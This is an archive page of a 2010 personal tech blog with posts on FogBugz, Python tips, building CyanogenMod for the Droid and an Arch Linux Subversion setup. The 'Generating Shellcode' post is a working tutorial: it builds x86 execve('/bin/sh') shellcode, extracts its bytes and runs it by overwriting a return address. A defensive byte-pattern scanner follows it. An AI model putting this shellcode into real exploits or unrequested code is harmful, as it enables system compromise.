BogFugz Update

July 14th, 2010 mpsb No comments

New BogFugz update fixes an error with hosted accounts. This requires a settings change for people who already have it working.

For instance, the FogBugz instance at my office is hosted by us. For that one I must now use the URL http://fogbugz.mycompany.com/fogbugz, whereas before this update I had to use fogbugz.mycompany.com only. The program was defaulting to http:// and automatically including the “/fogbugz”.

Now for a hosted account, like my test one, you must use https://optedoblivion.fogbugz.com

Note: Must not contain a / at the end!!!

I will be able to focus more attention on this application soon. Sorry for the delays everyone!

If you have any questions or want updates please follow @BogFugz on twitter.

Thank you.

Categories: Uncategorized Tags:

New Theme

March 26th, 2010 mpsb No comments

Time for a new theme. Let's see how long this one goes for.

Categories: Uncategorized Tags:

The Dark Arts – Generating Shellcode

March 25th, 2010 mpsb No comments

Ever wonder about the cryptic-looking hex shellcode? Ever wonder how the hell people produce those things? Does anyone still use them!?

Necessities

  • Linux (Any Flavor)
  • GCC
  • GDB
  • VIM (or NANO)

First we will start by creating a new file named shellcode.c containing this:

#include <unistd.h>
int main(){
    execve("/bin/sh", NULL, NULL);
    return 0;
}

What we have done here is demonstrate the execve() system call, which is number 0xb on 32-bit x86 Linux. The C library function execve() wraps this system call.

int execve(const char *filename, char *const argv[], char *const envp[])

Next we will need to replicate this code, but in assembly.

Make a new file called shellcode.s

.section .text
.global main

main:

xorl %eax,%eax # NULLIFY
xorl %ecx,%ecx # NULLIFY
xorl %edx,%edx # NULLIFY

pushl %edx # Push NULL string terminator
pushl $0x68732f2f # push //sh
pushl $0x6e69622f # push /bin

mov %esp, %ebx # Move stack pointer address to ebx (points at "/bin//sh")
pushl %edx # Push NULL terminator
movl %esp,%ecx # Move stack pointer address to ecx

movl $0xb, %eax # Move execve syscall number into eax
int $0x80 # Interrupt kernel for job

xorl %ebx,%ebx # NULLIFY (exit status 0)
movl %ebx,%eax # Set up for
incl %eax # Clean exit (eax = 1, the exit syscall)
int $0x80 # Interrupt kernel for exit

Basically, this can be broken into five parts:

  • NULL out Registers
  • Push /bin//sh onto stack
  • Set up execve arguments
  • Execute execve(“/bin/sh”, NULL, NULL)
  • Make a clean exit

Now that we have some working assembly code, let's try it out. :)

$ gcc -o shellcode shellcode.s
$ ./shellcode
$ exit
exit
$

You should have another shell session execute, and you can type “exit” and go back to the original shell session.

If that is the case, you are good, and you can skip this next part.

If not, you may need to alter the assembly to work for your machine. Try adding

pushl %ebx

Before this line:

movl %esp,%ecx # Move stack pointer address to ecx

If it works for you at this point, then open the binary in gdb.

$ gdb shellcode
(gdb) disassemble main
Dump of assembler code for function main:
0x08048374 : xor %eax,%eax
0x08048376 : xor %ecx,%ecx
0x08048378 : xor %edx,%edx
0x0804837a : push %edx
0x0804837b : push $0x68732f2f
0x08048380 : push $0x6e69622f
0x08048385 : mov %esp,%ebx
0x08048387 : push %edx
0x08048388 : mov %esp,%ecx
0x0804838a : mov $0xb,%eax
0x0804838f : int $0x80
0x08048391 : xor %ebx,%ebx
0x08048393 : mov %ebx,%eax
0x08048395 : inc %eax
0x08048396 : int $0x80
0x08048398 : nop
0x08048399 : nop
0x0804839a : nop
0x0804839b : nop
0x0804839c : nop
0x0804839d : nop
0x0804839e : nop
0x0804839f : nop
(gdb) x
0x8048398 : 0x90
(gdb) x/36 main
0x8048374 : 0x31 0xc0 0x31 0xc9 0x31 0xd2 0x52 0x68
0x804837c : 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69
0x8048384 : 0x6e 0x89 0xe3 0x52 0x89 0xe1 0xb8 0x0b
0x804838c : 0x00 0x00 0x00 0xcd 0x80 0x31 0xdb 0x89
0x8048394 : 0xd8 0x40 0xcd 0x80

Copy and paste this into vim (or nano), and edit it to look like this:


char shellcode[] =
"\x31\xc0\x31\xc9\x31\xd2\x52\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x89\xe1\xb8\x0b"
"\x00\x00\x00\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80";

Save the file as payload.h

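Now, create a new file called runsh.c

#include "payload.h"
int main(void){
    // ret is a local variable, so &ret is an address inside main's stack frame
    int * ret;
    // Point ret two ints above itself; with the 32-bit frame layout used here that slot is main's saved return address
    ret = (int *)&ret + 2;
    // Overwrite that slot with the address of shellcode, so main returns into it
    (*ret) = (int)shellcode;
}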

$ gcc -o runsh runsh.c
$ ./runsh
$ exit
exit
$

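Success! This relies on the 32-bit stack layout and on the data segment being executable; on kernels and toolchains that enforce NX or change the frame layout (for example with stack protectors), it will fail rather than spawn a shell.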
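As an added example (not code from the original post), here is a small C scanner a defender could use to flag this exact stub in a byte buffer: it looks for the two pushes that build /bin//sh, followed within a short window by mov $0xb,%eax and int $0x80. The function names, the window parameter and the benign sample are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* Byte patterns taken from the disassembly on this page. */
static const unsigned char PUSH_BIN_SH[] = {
    0x68, '/', '/', 's', 'h',       /* push $0x68732f2f */
    0x68, '/', 'b', 'i', 'n' };     /* push $0x6e69622f */
static const unsigned char MOV_EAX_0B[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };
static const unsigned char INT_80[] = { 0xcd, 0x80 };

/* The payload.h bytes from the page, used here only as scanner input. */
static const unsigned char SAMPLE[] =
    "\x31\xc0\x31\xc9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x52\x89\xe1\xb8\x0b\x00\x00\x00\xcd\x80\x31\xdb\x89"
    "\xd8\x40\xcd\x80";
/* Constructed benign input: the same path as text, no syscall setup. */
static const unsigned char BENIGN[] = "SHELL=/bin//sh\nPATH=/usr/bin\n";

/* First offset >= from where pat occurs in buf[0..len), or -1. */
static long find_seq(const unsigned char *buf, size_t len, size_t from,
                     const unsigned char *pat, size_t plen) {
    for (size_t i = from; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0)
            return (long)i;
    return -1;
}

/* Offset of the "/bin//sh" pushes if mov $0xb,%eax and then int $0x80
 * follow within `window` bytes; -1 if the buffer has no such sequence. */
long find_execve_stub(const unsigned char *buf, size_t len, size_t window) {
    long p;
    for (size_t from = 0;
         (p = find_seq(buf, len, from, PUSH_BIN_SH, sizeof PUSH_BIN_SH)) >= 0;
         from = (size_t)p + 1) {
        size_t start = (size_t)p + sizeof PUSH_BIN_SH;
        size_t end = (len - start < window) ? len : start + window;
        long m = find_seq(buf, end, start, MOV_EAX_0B, sizeof MOV_EAX_0B);
        if (m >= 0 && find_seq(buf, end, (size_t)m + sizeof MOV_EAX_0B,
                               INT_80, sizeof INT_80) >= 0)
            return p;
    }
    return -1;
}

int main(void) {
    printf("sample: %ld\n", find_execve_stub(SAMPLE, sizeof SAMPLE - 1, 32));
    printf("benign: %ld\n", find_execve_stub(BENIGN, sizeof BENIGN - 1, 32));
    return 0;
}
```

It matches only the encoding shown in the disassembly above, so treat it as a teaching signature rather than general shellcode detection.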

Quick Tips – Pydoc FTW

March 24th, 2010 mpsb No comments

Ever have the urge to know what the heck your python modules really do?

Why not just read what they have to say?

Well, if you’re running a Linux flavor, do this.


which pydoc

You should see something like /usr/bin/pydoc show up.

If that is the case, then do this.


pydoc -p 8000

Then browse to localhost:8000

Categories: Python, Quick Tips Tags:

Quick Tips – Date and Time localization

March 24th, 2010 mpsb No comments

Ever struggle with the best way to localize dates and times?

If you have, then pytz is your friend.

You have to easy_install this package because it’s not included in the python base packages.

easy_install pytz

Using it is quite simple. Here is a quick example. Let's say my current time is in US/Eastern. I create a datetime object using the datetime package by calling the now() function. The object this gives me is a naive datetime object.

>>> import pytz
>>> import datetime
>>> now = datetime.datetime.now()

I must now localize it to my current timezone.

>>> eastern = pytz.timezone("US/Eastern")
>>> now = eastern.localize(now)

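Now, if I need to display my time in another timezone, I can create another timezone object and convert my now-aware object to it with astimezone(). Calling localize() a second time would raise a ValueError, because localize() only accepts naive datetimes.

>>> utc = pytz.utc
>>> now = now.astimezone(utc)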

That about sums up how to use the package. Comes in really handy, and I’ve used it quite a few times in the past year.

Categories: Python, Quick Tips Tags:

CyanogenMod 5 for Droid

March 1st, 2010 mpsb No comments

Koush has done a good job at porting this to droid. http://bit.ly/cnrj8N
Installing it right now, and seeing how the stable version is. I tried beta 6, it seemed fine, except I didn’t like the first boot having 1200MHz off the start. Now this is using the stock kernel, so I’m happier about trying it. Booting now. There are some Audio Post Processor errors in the logcat, one of which can be easily fixed. libGL is still throwing render exceptions. Live wallpaper is not interactive with the original home launcher (the one with the app drawer). The keyboard backlight isn’t working, which is a big deal. I am not sure I would have called this stable and brought it out of beta. It also seems a bit sluggish with the stock kernel. I think a 600MHz kernel might help some, but probably not enough. All in all it’s a decent ROM to run, and has some good 2.1 features. It needs some fixes before I would consider it fully stable/production material, but considering all the work put into it, I still think koush has done a great job. You can follow him on twitter @koush.

Categories: Android, Uncategorized Tags:

Zero Gravity

March 1st, 2010 mpsb 5 comments

Just finished submitting Zero Gravity hax to Google for code review. I hope they accept it so everyone, even non-rooters, will have this ability.

Categories: Uncategorized Tags:

Awesome new boot logo!

February 24th, 2010 mpsb 1 comment

Check this out. This guy has done some awesome work for replacing your boot logo from the Motorola M to a skull and crossbones!

See here

Categories: Uncategorized Tags:

AOSP/CyanogenMod5 and the Droid

February 24th, 2010 mpsb 2 comments

STOP: YOU NEED ROOT!

If you like this please Donate for a dev droid. (http://bit.ly/OptedDonate)

Most of the development scene going on for Android revolves around the HTC world. I am a big HTC fan, and love their phones. I am with Verizon though, and the last HTC I had was an HTC Touch/Vogue, which I successfully ran Android on. It wasn’t too pretty though. Now that I have a Droid, and there seems to be a small community of Droid developers, a lot of them try to hide their trade secrets. My goal is to post everything I can figure out about this awesome device.

Wanna work with the AOSP to compile your own vendor setup? Choose which packages you want to install? Let's do it! I am going to go over the easiest way possible.

In order to work with this you will need to familiarize yourself with Git, which can be done with Google, so we won’t cover that here. Really you can get away with reading the link in step two, but it is recommended to RTFM.

Most of these tools are obtainable by searching Google!

Full List of Needs:

  • SPRecovery 0.99b
  • Sun Java SDK 1.5
  • Git
  • Repo Tool
  • flash_image tool
  • Brain

Disclaimer: IF YOU BRICK YOUR DEVICE ONLY YOU ARE RESPONSIBLE!!!

Okay, Step 1 – navigate to http://www.github.com/cyanogen (this guy is awesome, so be sure to stop by and thank him on twitter @cyanogen)

Step 2 – Download the repo tool from Google. Go here and read this to learn how to use it and Git.

Google Repo and Git

Step 3 – OK, now that we have the tools needed to get the repo, let's get some code!


mkdir -p $HOME/Cyanogen && cd $HOME/Cyanogen
repo init -u git://github.com/cyanogen/android.git -b eclair
repo sync

Now take a trip to your local gate for a red bull.

*some jeopardy music as you drink your red bull*

When it’s done, you should have a huge directory of code (~3.5GB). In short, what the repo tool did was a massive Git clone from many locations. These locations can be found in .repo/manifest.xml.

Step 4 – Now let's try to build something!


cd vendor/motorola/sholes-open

Step 5 – Plug in your phone. I am assuming you have ADB (Android Debug Bridge) and the appropriate udev rules!

Step 6 – Run the proprietary extraction script provided in the sholes-open vendor setup.

./extract-files.sh

Step 7 – Now for the fun part
Note: depending on how many cores you have, replace the -j8 with -j.

cd $HOME/Cyanogen
source build/envsetup.sh
lunch cyanogen_sholes-eng
make -j8

Step 8 – Wait….. Depending on how long it takes for your local repo to compile, you might wanna take a nap or go do something.

Note: This article doesn’t cover debugging the build!

Step 9 – Once your repo has successfully compiled:


cd $HOME/Cyanogen/out/target/product/sholes-open/

Look around; you should see quite a few files. The only ones we should be interested in for the moment are:

  • boot.img
  • system

Now do this:
Note: this is for SPRecovery. There is a better recovery out from clockworkmod. You can package the build as an update.zip for that one.

cd system
tar -cvvf system.tar `ls`
cd ..
mkdir -p ./packaged && cd packaged
mv ../boot.img ./
mv ../system/system.tar ./
adb shell mkdir /sdcard/cyanogen
adb push boot.img /sdcard/cyanogen/
adb push system.tar /sdcard/cyanogen/
adb reboot recovery

Now we need to install it. Everything from here forward will be done in the android terminal via “adb shell”
Now also would be a good time to nandroid!

In your terminal type “adb shell”

Now in your recovery shell

Make sure your sdcard is mounted!

mount /sdcard
cd /sdcard/cyanogen
format SYSTEM:
format DATA:
format CACHE:
flash_image boot boot.img
mount /system
cd /system
tar xvf /sdcard/cyanogen/system.tar
exit

Now type “adb reboot”,
then “adb lolcat” to watch it boot.

Good luck!

Categories: Android, Git Tags:

Arch Linux SSL Subversion HOWTO

February 12th, 2010 mpsb 68 comments

To set up Arch Linux with Subversion over HTTPS, you will first need to make sure you have the proper dependencies installed.

  1. Subversion
  2. Apache

This can be accomplished via pacman like so:

pacman -S apache subversion

Check your /etc/httpd/conf/httpd.conf for these entries:

LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so

Now we need to set up an SSL cert. To do this, run:

cd /etc/httpd/conf
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Enter the information requested by the prompts. Because of -nodes, server.key is written unencrypted, so keep that file readable only by root.

Now edit the following file: /etc/httpd/conf/extra/httpd-ssl.conf to add the block below (replace SVN_URL_PATH with the URL path to serve the repositories under):

<Location /SVN_URL_PATH>
    DAV svn
    SVNParentPath /home/svn/repositories
    AuthzSVNAccessFile /home/svn/.svn-policy-file
    AuthName "SVN Repositories"
    AuthType Basic
    AuthUserFile /home/svn/.svn-auth-file
    Satisfy Any
    Require valid-user
</Location>

Now edit /etc/httpd/conf/httpd.conf to uncomment or add this line

Include conf/extra/httpd-ssl.conf

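Almost done!
Now edit /home/svn/.svn-policy-file and add the following. Combined with Satisfy Any in the Apache block, the * = r rule under [/] gives everyone, including anonymous users, read access to every repository, while USER_NAME gets read-write access to REPO_NAME: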

[/]
* = r
[REPO_NAME:/]
USER_NAME = rw

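Now run

htpasswd -cs /home/svn/.svn-auth-file USER_NAME

Replace USER_NAME with your desired username, then set a password. The -c flag creates the file and overwrites an existing one, so omit it when adding more users later.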

Restart Apache:

/etc/rc.d/httpd restart

Make sure that when you create a repo in the repositories folder, you run

chown -R http:http /home/svn/repositories/REPO_NAME

to give it proper permissions.

Categories: Arch Linux, Subversion Tags: